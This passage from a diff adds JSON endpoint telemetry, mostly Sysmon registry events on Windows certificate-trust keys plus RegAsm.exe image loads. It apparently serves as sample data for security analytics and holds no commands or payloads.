"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863090000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "RegAsm.exe", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "mscoree.dll", + "image_path": "C:\\Windows\\SysWOW64\\mscoree.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 